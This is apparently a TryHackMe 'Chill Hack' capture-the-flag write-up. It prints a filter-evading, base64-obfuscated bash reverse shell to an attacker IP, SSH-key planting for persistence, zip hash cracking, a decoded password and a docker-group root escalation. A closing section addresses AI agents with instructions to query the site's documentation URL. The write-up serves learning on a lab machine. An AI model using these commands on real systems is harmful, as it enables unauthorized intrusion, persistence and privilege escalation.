# Chill Hack

## Nmap

```
sudo nmap 10.10.77.207 -p- -sS -sV

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 
(Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 80 takes us to the following page:

![](/files/-MVcV1Il-eGCxe6xGOdQ)

Running dirsearch against the target machine reveals a directory called secret.

![](/files/-MVcVFrWgna2l8d5sTib)

The following page for /secret/ contains a command box.

![](/files/-MVcVQLpp1o8cu8sC1su)

Running the id command shows we are running as www-data.

![](/files/-MVcVYTIwepM6bikyrkA)

Attempting to run binaries and commands such as cat are filtered presenting with the following page.

![](/files/-MVcVk9aQXUIav-cCTVv)

The following page from <https://book.hacktricks.xyz/linux-unix/useful-linux-commands/bypass-bash-restrictions> shows that we have multiple ways to attempt to bypass the filter. The first section regarding Reverse shell shows a reliable method for gaining a shell.

```
echo "echo $(echo 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
```

Once the command has been run on the attacking machine take the output and run it on the command box on the target machine.

![](/files/-MVcWF6S9UVWu68pX9dj)

The output below was run on the target machine and `netcat` on my attacking machine caught a shell.

```
echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhOQzR6TGpFd09DODRNQ0F3UGlZeENnPT0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
```

![](/files/-MVcWUUTWZB9bOP9Bnx7)

Running linpeas.sh on the target machine reveals the following interesting information:\\

![](/files/-MVc_V6VLz9TNkSwzmb1)

Running `sudo -u aparr /home/apaar/.helpline.sh` produces an interactive shell script. Which can be escaped by running `bash`.

![](/files/-MVc_hRxnY22UW06AIjm)

Linpeas shows a service is running locally on port 9001.

![](/files/-MVcnHUTft8fBexiCv4x)

We can drop a SSH key onto the attacking server to get SSH service to then forward the port to our attacking machine.

**Attacking machine**

```
ssh-keygen -t rsa
```

Hit enter until the command completes. Copy the contents of the id\_rsa.pub file in the attacking machines home directory and echo this into authorized\_keys file for the user apaar.

**Target machine**

```
echo '<Contents of attacking machine id_rsa.pub>' > /home/apaar/.ssh/authorized_keys
```

![](/files/-MVcnzwYx5MJW5sYIGXN)

We can then connect to SSH as the user apaar without specifcying the password. Using the following syntax we can forward the target machine local port of 9001 to our attacking machine with SSH.

```
ssh -L 9001:127.0.0.1:9001 apaar@10.10.77.207  
```

We can then access <http://127.0.0.1:9001> in a web browser.

![http://127.0.0.1:9001/](/files/-MVcoqJR8D4VUtfEeATp)

Performing directory enumeration on this reveals the /images/ directory.

![](/files/-MVcp1pgu58kzSpVb-U9)

![http://127.0.0.1:9001/images/](/files/-MVcpAkarWoup_YxhRTE)

Saving the image file hacker-with-laptop\_23-2147985341.jpg and running `steghide` reveals the following.

```
steghide --extract -sf ~/Desktop/hacker-with-laptop_23-2147985341.jpg 
```

![](/files/-MVcpVuMKjLDFwjEGlPq)

The archive backup.zip is password protected. Using zip2john we can create a hash and crack with john.

```
/usr/sbin/zip2john /home/kali/backup.zip > /home/kali/Desktop/hash
```

![](/files/-MVcpeoiHXJyMsR-f1EI)

Extracting the contents reveals the file source\_code.php.

![](/files/-MVcqg-U3oWkQeG-pNA0)

Running the base64 value through -d reveals the following:

```
echo 'IWQwbnRLbjB3bVlwQHNzdzByZA==' | base64 -d
!d0ntKn0wmYp@ssw0rd     
```

We also have the user anurodh. The credentials can then be used to SSH into anurodh.

![](/files/-MVeklNGg-unuuPLaa8x)

Viewing the groups anurodh is a member of we do see docker. Running the following command taken from GTFOBins will give us root access. <https://gtfobins.github.io/gtfobins/docker/>

```
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```

![](/files/-MVel7Wc-hKH2gujpKz-)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/chill-hack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.